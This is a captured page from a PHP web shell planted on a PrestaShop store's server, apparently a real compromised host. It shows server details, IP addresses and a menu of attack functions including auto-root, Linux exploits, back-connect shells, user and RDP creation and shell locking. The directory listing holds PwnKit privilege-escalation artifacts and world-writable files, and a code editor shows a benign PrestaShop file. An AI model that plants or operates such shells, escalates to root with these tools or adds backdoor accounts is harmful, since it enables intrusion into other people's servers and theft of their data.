Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
src /
Core /
Search /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Builder
[ DIR ]
drwxrwxrwx
Filters
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ControllerAction.php
2.29
KB
-rwxrwxrwx
Filters.php
2.92
KB
-rwxrwxrwx
SearchParameters.php
2.7
KB
-rwxrwxrwx
SearchParametersInterface.php
1.58
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SearchParametersInterface.php
<?php /** * Created by PhpStorm. * User: dev * Date: 04/07/18 * Time: 12:24. */ namespace PrestaShop\PrestaShop\Core\Search; use Symfony\Component\HttpFoundation\Request; /** * Contract that define how we can retrieve Grid filters from an User request or Repository. * IMPORTANT NOTE: these methods should ONLY return the filters of their respective scope (no * default replacement) otherwise you can't know where the values exactly come from which make * it impossible to fine tune overrides (which one has the priority). * * @see SearchParametersResolver class for usage. * @deprecated Use FiltersBuilderInterface instead */ interface SearchParametersInterface { const FILTER_TYPES = array( 'limit', 'offset', 'orderBy', 'sortOrder', 'filters', ); /** * Retrieve list of filters from User Request (ONLY those present in * the request). * * @param Request $request * @param string $filterClass the filter class * * @return Filters A collection of filters */ public function getFiltersFromRequest(Request $request, $filterClass); /** * Retrieve list of filters from User searches (ONLY those saved in repository). * * @param int $employeeId * @param int $shopId * @param string $filterClass the filter class * @param string $controller the controller name * @param string $action the action name * * @return Filters|null A collection of filters */ public function getFiltersFromRepository($employeeId, $shopId, $controller, $action, $filterClass); }
Close